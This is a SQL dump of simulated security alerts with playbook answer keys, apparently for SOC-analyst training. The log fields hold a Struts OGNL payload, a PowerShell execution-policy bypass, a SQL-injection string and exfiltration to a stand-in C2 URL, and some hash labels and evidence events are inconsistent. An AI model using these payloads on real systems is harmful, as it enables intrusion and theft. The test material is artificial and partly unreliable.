INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(575, 'Data Exfiltration of Credit Card Information', 'high', 'Data Loss Prevention (DLP) logs', 'In the final stage, attackers exfiltrated credit card data via an unauthorized FTP transfer to an external IP address, preparing to monetize the information through underground channels.', 'Exfiltration', 'T1048.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:23:54Z\",\"event_id\":\"dlp-20231025-142354\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"21\",\"protocol\":\"FTP\",\"username\":\"compromised_user\",\"exfiltrated_files\":[\"credit_card_data.csv\"],\"md5_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"allowed\",\"alert\":\"Credit card data exfiltration detected\"}', '2026-01-08 22:01:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external dns\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used for data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"credit_card_data.csv\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive credit card information\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Hash of exfiltrated credit card data file\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Account used for unauthorized access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.206Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:54Z\\\",\\\"event_id\\\":\\\"dlp-20231025-142354\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"21\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"exfiltrated_files\\\":[\\\"credit_card_data.csv\\\"],\\\"md5_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert\\\":\\\"Credit card data exfiltration detected\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.206Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:54Z\\\",\\\"event_id\\\":\\\"dlp-20231025-142354\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"21\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"exfiltrated_files\\\":[\\\"credit_card_data.csv\\\"],\\\"md5_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert\\\":\\\"Credit card data exfiltration detected\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.206Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:54Z\\\",\\\"event_id\\\":\\\"dlp-20231025-142354\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"21\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"exfiltrated_files\\\":[\\\"credit_card_data.csv\\\"],\\\"md5_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert\\\":\\\"Credit card data exfiltration detected\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.206Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:54Z\\\",\\\"event_id\\\":\\\"dlp-20231025-142354\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"21\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"exfiltrated_files\\\":[\\\"credit_card_data.csv\\\"],\\\"md5_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert\\\":\\\"Credit card data exfiltration detected\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.206Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:54Z\\\",\\\"event_id\\\":\\\"dlp-20231025-142354\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"21\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"exfiltrated_files\\\":[\\\"credit_card_data.csv\\\"],\\\"md5_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert\\\":\\\"Credit card data exfiltration detected\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(576, 'Suspicious HTTP Request Detected', 'high', 'Web Server Logs', 'A crafted HTTP request aimed at exploiting the Apache Struts vulnerability was detected. This attack attempts to gain initial access to the server by exploiting CVE-2017-5638.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:54Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"http_method\":\"GET\",\"url\":\"/struts2-showcase/index.action\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"payload\":\"${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'X-Exploit-Test\',\'Success\'))}\",\"response_code\":200,\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Empty file hash often used for testing or malicious purposes.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/struts2-showcase/index.action\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"payload\\\":\\\"${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'X-Exploit-Test\',\'Success\'))}\\\",\\\"response_code\\\":200,\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/struts2-showcase/index.action\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"payload\\\":\\\"${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'X-Exploit-Test\',\'Success\'))}\\\",\\\"response_code\\\":200,\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/struts2-showcase/index.action\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"payload\\\":\\\"${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'X-Exploit-Test\',\'Success\'))}\\\",\\\"response_code\\\":200,\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/struts2-showcase/index.action\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"payload\\\":\\\"${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'X-Exploit-Test\',\'Success\'))}\\\",\\\"response_code\\\":200,\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/struts2-showcase/index.action\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"payload\\\":\\\"${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'X-Exploit-Test\',\'Success\'))}\\\",\\\"response_code\\\":200,\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(577, 'Unusual Command Execution Observed', 'high', 'Application Logs', 'Post-exploitation activity detected. An attacker executed a series of suspicious commands to establish control over the server. The commands are indicative of an attempt to further compromise the system by downloading additional malicious payloads.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"log_source\":\"application_log\",\"event_type\":\"command_execution\",\"user\":\"compromised_user\",\"source_ip\":\"192.168.1.105\",\"command\":\"powershell -exec bypass -File C:\\\\Users\\\\Public\\\\malicious.ps1\",\"malicious_file\":\"C:\\\\Users\\\\Public\\\\malicious.ps1\",\"attacker_ip\":\"198.51.100.23\",\"hash\":\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\",\"additional_info\":\"Command executed with elevated privileges\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known malware variant\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.209Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"log_source\\\":\\\"application_log\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"command\\\":\\\"powershell -exec bypass -File C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"malicious_file\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"attacker_ip\\\":\\\"198.51.100.23\\\",\\\"hash\\\":\\\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\\\",\\\"additional_info\\\":\\\"Command executed with elevated privileges\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.209Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"log_source\\\":\\\"application_log\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"command\\\":\\\"powershell -exec bypass -File C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"malicious_file\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"attacker_ip\\\":\\\"198.51.100.23\\\",\\\"hash\\\":\\\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\\\",\\\"additional_info\\\":\\\"Command executed with elevated privileges\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.209Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"log_source\\\":\\\"application_log\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"command\\\":\\\"powershell -exec bypass -File C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"malicious_file\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"attacker_ip\\\":\\\"198.51.100.23\\\",\\\"hash\\\":\\\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\\\",\\\"additional_info\\\":\\\"Command executed with elevated privileges\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.209Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"log_source\\\":\\\"application_log\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"command\\\":\\\"powershell -exec bypass -File C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"malicious_file\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"attacker_ip\\\":\\\"198.51.100.23\\\",\\\"hash\\\":\\\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\\\",\\\"additional_info\\\":\\\"Command executed with elevated privileges\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.209Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"log_source\\\":\\\"application_log\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"command\\\":\\\"powershell -exec bypass -File C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"malicious_file\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"attacker_ip\\\":\\\"198.51.100.23\\\",\\\"hash\\\":\\\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\\\",\\\"additional_info\\\":\\\"Command executed with elevated privileges\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(578, 'Web Shell Detected in Server Directory', 'high', 'File Integrity Monitoring', 'A web shell was detected in the server directory, indicating an attempt to maintain persistent access to the compromised system. The file integrity monitoring system flagged an unauthorized file upload, which was later identified as a web shell. The immediate threat involves potential unauthorized control over the server.', 'Persistence', 'T1505.003 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"event_type\":\"file_change\",\"host_ip\":\"192.168.1.10\",\"file_path\":\"/var/www/html/shell.php\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"webadmin\",\"source_ip\":\"203.0.113.45\",\"action\":\"upload\",\"status\":\"success\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a common web shell\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"shell.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of known web shells\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.210Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"/var/www/html/shell.php\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"webadmin\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"upload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.210Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"/var/www/html/shell.php\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"webadmin\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"upload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.210Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"/var/www/html/shell.php\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"webadmin\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"upload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.210Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"/var/www/html/shell.php\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"webadmin\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"upload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.210Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"/var/www/html/shell.php\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"webadmin\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"upload\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(579, 'Unexpected Outbound Traffic Spike', 'high', 'Network Traffic Analysis', 'Detected a significant spike in outbound network traffic from internal systems to an external IP associated with known malicious activity. The data being exfiltrated includes sensitive files.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:07Z\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"port\":443,\"bytes_sent\":10485760,\"filename\":\"confidential_data.zip\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"process\":\"data_exfil.exe\",\"url\":\"https://malicious-c2-server.com/upload\",\"indicator_type\":\"malware\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 server.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Policies\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known exfiltration tool.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://malicious-c2-server.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation\",\"verdict\":\"malicious\",\"details\":\"URL linked to malicious C2 activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, 